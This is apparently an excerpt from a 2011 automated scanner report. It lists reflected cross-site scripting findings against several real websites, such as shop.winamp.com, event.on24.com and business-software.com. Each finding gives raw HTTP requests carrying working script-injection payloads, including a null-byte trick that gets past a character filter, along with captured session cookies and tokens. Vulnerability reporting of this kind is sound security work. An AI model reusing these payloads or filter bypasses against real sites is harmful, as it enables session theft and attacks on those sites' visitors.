GET /weblog%00dcea7"><script>alert(1)</script>512fbcc591d/2006/03/faster HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:06 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c01ec<a>2a3ca83c34f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:17 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sat, 26 Feb 2011 23:20:17 GMT Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00fa627<a>784e947c10e was submitted in the REST URL parameter 1. This input was echoed as fa627<a>784e947c10e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:50 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0078f44"><script>alert(1)</script>c42523ab52d was submitted in the REST URL parameter 1. This input was echoed as 78f44"><script>alert(1)</script>c42523ab52d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /weblog%0078f44"><script>alert(1)</script>c42523ab52d/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:49 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f526a<a>bc4d18aee79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:21:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sat, 26 Feb 2011 23:21:28 GMT Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
3.41. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8539"><script>alert(1)</script>90e6230aa36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8539\"><script>alert(1)</script>90e6230aa36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?d8539"><script>alert(1)</script>90e6230aa36=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2 was submitted in the key parameter. This input was echoed as 954f9"><x style=x:expression(alert(1))>935c7211ee2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542954f9"><x%20style%3dx%3aexpression(alert(1))>935c7211ee2&partnerref=ocom&sourcepage=register HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:29:57 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=rTgXMMJ19hpxRmQBeHTZpBSHLmdhQwpUS9D079bkV7zEURAZjdB9!865718048; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="key" value="453849B62CAB589517473EC368BF9542954f9"><x style=x:expression(alert(1))>935c7211ee2"> ...[SNIP]...
The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315 was submitted in the partnerref parameter. This input was echoed as 99c8f"><x style=x:expression(alert(1))>81a40639315 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom99c8f"><x%20style%3dx%3aexpression(alert(1))>81a40639315&sourcepage=register HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:08 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=7cDI022cgrDsLBgCWczqE6wL9UAd4cjBPhMG2cmQDAsmDcV7RZYq!-1586332666; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="partnerref" value="ocom99c8f"><x style=x:expression(alert(1))>81a40639315"> ...[SNIP]...
The value of the sourcepage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 was submitted in the sourcepage parameter. This input was echoed as ab0db"><x style=x:expression(alert(1))>113da7be2a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /eventRegistration/EventLobbyServlet?target=registration.jsp&eventid=274282&sessionid=1&key=453849B62CAB589517473EC368BF9542&partnerref=ocom&sourcepage=registerab0db"><x%20style%3dx%3aexpression(alert(1))>113da7be2a3 HTTP/1.1 Host: event.on24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:17 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=62BqOkDMbxlMQz6LJa9JVd0qcMfDA1sqzBfibypGJraqoBW2Rf32!-1281997819; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close
<!-- optional parameters cb : leave blank to hide logo, or pass in appropriate cb value topmargin - default is 20 leftmargin ...[SNIP]... <input type="hidden" name="sourcepage" value="registerab0db"><x style=x:expression(alert(1))>113da7be2a3"> ...[SNIP]...
The value of the mID request parameter is copied into the HTML document as plain text between tags. The payload eb22e<script>alert(1)</script>85708136ac4ac84a6 was submitted in the mID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /register?swfVer=2371&sk=4300947c68314c1251174fbec281db2c179656ed&ua=Mozilla%2F5%2E0%20%28Windows%3B%20U%3B%20Windows%20NT%206%2E1%3B%20en%2DUS%29%20AppleWebKit%2F534%2E13%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F9%2E0%2E597%2E98%20Safari%2F534%2E13&jsVer=0%2E4%2E0&mID=gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6&ref=http%3A%2F%2Fwww%2Ethedetroitbureau%2Ecom%2Fabout%2Dus%2F&tabId=%5Fflash%5F28853bf0ac29099fa00d4de19cf16898206ee90c&accountKey=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&ak=zNGIkGNBzGwfX48wS7PchwQECOzEXOCT&title=SEO%20Company%20USA%2C%20Michigan%20Web%20Design%20Services%2C%20Print%20Design%2C%20Flash%20Designing%2C%20Website%20design%20Companies%20Novi%2C%20E%2DCommerce%20Designer&url=http%3A%2F%2Fwww%2Esti%2Dcs%2Ecom%2F HTTP/1.1 Host: init.zopim.com Proxy-Connection: keep-alive Referer: http://zopim.com/swf/ZClientController.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 26 Feb 2011 20:42:18 GMT Connection: keep-alive Content-Length: 856
{"status": "offline", "__status": "ok", "name": "Visitor 210780399", "settings": {"chatbutton": {"position": "br", "theme": "bar"}, "greetings": {"away": {"window": "If you leave a question or comment ...[SNIP]... Leave a message"}, "online": {"window": "Leave a question or comment and our agents will try to attend to you shortly =)", "bar": "Click here to chat"}}}, "machineID": "gLAMf6t1oQdRZ9pJbWZsb367xnR0jSnYeb22e<script>alert(1)</script>85708136ac4ac84a6", "nick": "visitor:210780399", "host": "lc03.zopim.com", "chat": {"members": [], "history": []}, "sid": "dFAqD1Ku9sANzup4iVjoZlanIFmiEk6o8QAQLwDi", "evt": 0, "email": ""}
The value of the vid request parameter is copied into the HTML document as plain text between tags. The payload a35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 was submitted in the vid parameter. This input was echoed as a35d3<img src=a onerror=alert(1)>e181c272a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /webrecorder/g/chimera.js?vid=nulla35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 HTTP/1.1 Host: lfov.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Coyote-2-405e0b67=405e0b12:0
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c68ad<script>alert(1)</script>2366c191886 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /utils/get?url=http%3A%2F%2Fioerror.us%2F2008%2F08%2F07%2Ffinal-pictures-from-duncannon-pa%2F&srcUrl=http%3A%2F%2Fioerror.us%2Ffeed%2F&callback=outbrain_rater.returnedOdbData(${json},0)c68ad<script>alert(1)</script>2366c191886&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=&apv=false&rand=0.05641490779817104&sig=RKWTKL3v HTTP/1.1 Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://ioerror.us/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; _lvd2="p47tkLgO+tdtgtEB03I2oA=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; _lvs2="23sEltQMc/A="
3.48. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.winamp.com
Path:
/DRHM/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94384-->4321560c01e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /DRHM/store?Action=DisplayProductInterstitialDetailsPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&productID=103591500&94384-->4321560c01e=1 HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280341872,0) Date: Sun, 27 Feb 2011 17:47:17 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 14076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911800&StyleVersion=3&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ProductInterstitialDetailsPage ...[SNIP]...
3.49. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.winamp.com
Path:
/store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 741fc-->4ffb80c87d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage&741fc-->4ffb80c87d5=1 HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525015766,0) Date: Sun, 27 Feb 2011 17:47:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 101351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=QuickBuyCartPage"--> ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 12603<script>alert(1)</script>368df4f71e6 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http%3A//techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/classics/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887e2"><script>alert(1)</script>3846485b49a was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31949"><script>alert(1)</script>6472702855d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw"> ...[SNIP]...
3.53. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.business-software.com
Path:
/top-10-web-content-management-vendors.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4664"><script>alert(1)</script>215d5cf1a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1 HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the track request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8831c"><script>alert(1)</script>0aa3cd70274 was submitted in the track parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the traffic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c411b"><script>alert(1)</script>5975ff9a4a8 was submitted in the traffic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload bf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef was submitted in the url parameter. This input was echoed as bf915<img src=a onerror=alert(1)>77ba82f09ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cws/share-count?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglishbf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef HTTP/1.1 Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/commentary/ashour1/English Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:1083319264699442203"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8qHmbJnGz3ALaeEKNDhv6Mnph3zq5ejKEjY-bzJWaTAdnP_K27P2mp:1298773233:7ca8bc841c7b778fb2296ec1656d588ca5376bc7"; Version=1; Max-Age=1799; Expires=Sun, 27-Feb-2011 02:50:32 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/ Set-Cookie: bcookie="v=1&b9beeacf-d5b5-4c7b-8122-9094af2abc48"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/ Vary: Accept-Encoding Content-Type: text/javascript;charset=UTF-8 Content-Language: en-US Date: Sun, 27 Feb 2011 02:20:33 GMT Content-Length: 151
